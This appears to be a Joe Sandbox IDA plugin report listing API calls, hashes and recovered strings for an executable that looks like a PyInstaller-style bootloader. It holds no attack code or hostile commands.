                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                                            • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                            • Instruction ID: 0bccee64ff07e10a3435a72a9376a38827acb2b2b52508163820708f931c66c0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9E04610F0C6A2A2FB0CBBF2A8841BA22A69F98704B004034CD1DC2391EE3C68858310
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,00007FF6404F9CE5,?,?,00000000,00007FF6404F9D9A), ref: 00007FF6404F9ED6
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6404F9CE5,?,?,00000000,00007FF6404F9D9A), ref: 00007FF6404F9EE0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                                            • Instruction ID: eedf25f2b05d0655e21498cbdec18688e9d19f6df4cd42a0092cd8ddb62cc3eb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD21C53260C68196DB65BF28D54037E72A1FB86B98F544234DA6D877D5DF3DD8008B00
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                                            • Instruction ID: aefa84df2ba0a0cd2fca3bf567ad65d4562a04af02d94f99f3b79dd55db81223
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7901C421A1C7A290EA04FF569900079A695FF96FE0F484631DE6C93BD6DF3CE4029340
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6404E3FA4,00000000,00007FF6404E1925), ref: 00007FF6404E86E9
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNELBASE(?,00007FF6404E5C06,?,00007FF6404E308E), ref: 00007FF6404E81C2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2592636585-0
                                                                                                                                                                                                                                                            • Opcode ID: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
                                                                                                                                                                                                                                                            • Instruction ID: 9c35eadd9dc4f6adfc24770bf99ed30d40ea9da551ffef3ce53d639e16dc83fc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AD08C11B2826191FE58FB77AA4A56951529BCABC0E488034EE1C43B46DC3CC0804B00
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF6404EFFB0,?,?,?,00007FF6404F161A,?,?,?,?,?,00007FF6404F2E09), ref: 00007FF6404FC94A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                                                            • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                                            • Instruction ID: f521ba59cfb01d67be82970a1102318cebdaaca2b8441e20f092a82f209aff6b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F01251F2D267E5FE5876B15A51BB9128A9F84774F084630DD3EC53C1DEACA5418310
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7A1B
                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7A9E
                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ABD
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ACB
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ADC
                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7AE5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                                                            • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                            • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                                                            • Instruction ID: 135ee184f5db4f079a8e8967783671618695dee313c272bd813e7931e680f166
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A417321A0C562E5EA20FB24E5949BD6360FFA5764F440632D9ADC37D4DF3CE64AC780
                                                                                                                                                                                                                                                            APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
• Instruction ID: 3ec315774e2e966e507582b769b1e8d3e34b39d51ed6993d7d51d750dfd109b8
• Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
• Instruction Fuzzy Hash: CC314C7661CB9296EB64EF60E8903EE7360FB85748F04443ADA4E87B99DF38D548C710
APIs
• _get_daylight.LIBCMT ref: 00007FF640504F55
  • Part of subcall function 00007FF6405048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048BC
  • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
  • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
  • Part of subcall function 00007FF6404F9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6404F9BEF,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404F9C19
  • Part of subcall function 00007FF6404F9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6404F9BEF,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404F9C3E
• _get_daylight.LIBCMT ref: 00007FF640504F44
  • Part of subcall function 00007FF640504908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64050491C
• _get_daylight.LIBCMT ref: 00007FF6405051BA
• _get_daylight.LIBCMT ref: 00007FF6405051CB
• _get_daylight.LIBCMT ref: 00007FF6405051DC
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64050541C), ref: 00007FF640505203
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
• Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
• Instruction ID: 7e4a4c9c830baa433aa96951ff4f0cbac14d7fc1549b2dded7bfed066c782698
• Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
• Instruction Fuzzy Hash: E3D1C176E1C262A6E728FF21D6502BE6391EF46788F448035EA6D87786DF3CE841C740
APIs
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
• Instruction ID: 3891df918236542e21a933cb94d5bbda2276a66832b62c853e2cb9478c37822d
• Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
• Instruction Fuzzy Hash: 7231B43661CF9295EB64EF25E8802AE33A4FB89758F540135EA9D83B98DF3CC545CB00
APIs
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
• Instruction ID: 37b713b53cc68f08942d79398f14ce3f1865504be49422b01fcfef59d1de5146
• Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
• Instruction Fuzzy Hash: 7BB1D522B1C6A291EA68BB61D6101BD6395FB46BECF446131EE6D97BC5DF3CE841C300
APIs
• _get_daylight.LIBCMT ref: 00007FF6405051BA
  • Part of subcall function 00007FF640504908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64050491C
• _get_daylight.LIBCMT ref: 00007FF6405051CB
  • Part of subcall function 00007FF6405048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048BC
• _get_daylight.LIBCMT ref: 00007FF6405051DC
  • Part of subcall function 00007FF6405048D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048EC
  • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
  • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64050541C), ref: 00007FF640505203
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3458911817-0
                                                                                                                                                                                                                                                            • Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                                                                                                            • Instruction ID: b58667a0859c4565491414ec19ff1220c40c75b2265e47e50320d6277c7c88b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F51A336A0C662A6E718FF21DA811AD6760FF4A788F444539EA2DC7796DF3CE440CB40

APIs
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E50C0
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5101
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5126
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E514B
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5173
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E519B
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E51C3
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E51EB
• GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5213
Strings
Similarity
• API ID: AddressProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 190572456-2007157414
• Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
• Instruction ID: 749e0cb1e1f514267acb106d647e8661d968cbb92c6662e071f59433196bb520
• Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
• Instruction Fuzzy Hash: 28129B6491EF23F1FA5DFB04AA542B827B0EF06758F945435D82E923A0EF7CB5488781

APIs
Strings
Similarity
• API ID: AddressProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 190572456-3427451314
• Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
• Instruction ID: abbbf6ab425959a4ee5db86c0e07891b53cc1cfff00ffca5121d5a0f11402665
• Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
• Instruction Fuzzy Hash: 5DE1766890DB63F0FA5DFB14BA541B833A5EF1A798F845435C82E823A4EF3CA548C351

Strings
Similarity
• API ID: Message
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2030045667-1550345328
• Opcode ID: a6afda6375053f9f7c6ea0d4aafbd39b87900b6fab8cbbe9d26c6b4613d1e6e7
• Instruction ID: dfd4575e4f547f119721587526c5d570a059d85c798b5f96c23ea6539c55306f
• Opcode Fuzzy Hash: a6afda6375053f9f7c6ea0d4aafbd39b87900b6fab8cbbe9d26c6b4613d1e6e7
• Instruction Fuzzy Hash: AC51AD61B0C663F2EA14FB25AA405B923A1FF85B98F444131EE1D87BA5EF7CE5548380

APIs
  • Part of subcall function 00007FF6404E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6404E3FA4,00000000,00007FF6404E1925), ref: 00007FF6404E86E9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF6404E7C97,?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E782C
  • Part of subcall function 00007FF6404E26C0: MessageBoxW.USER32 ref: 00007FF6404E2736
Strings
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
• Opcode ID: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
• Instruction ID: 506f906f73d081f3596a968a9d7fb226fe389954db74e8cd44959733c381078a
• Opcode Fuzzy Hash: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
• Instruction Fuzzy Hash: BA41F421B2C663F0FB64FB24E955ABA6261FFA4794F404031DA5EC2796EF7CE1048780
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                            • Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                                                                                                                                                                            • Instruction ID: 0bb270964456ae748b4171e7974fb360b430edc69f1fa457c445cd47c0f1082c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51E7266187B186D638AF22A4581BAB7A1F798B65F004121EBDE83785DF3CD145CB10
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                            • Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                                                                                                                                                                            • Instruction ID: b1ffd64a29b30de40f11d6719f3241b881efdfef73416272129fd478e78c3d5b
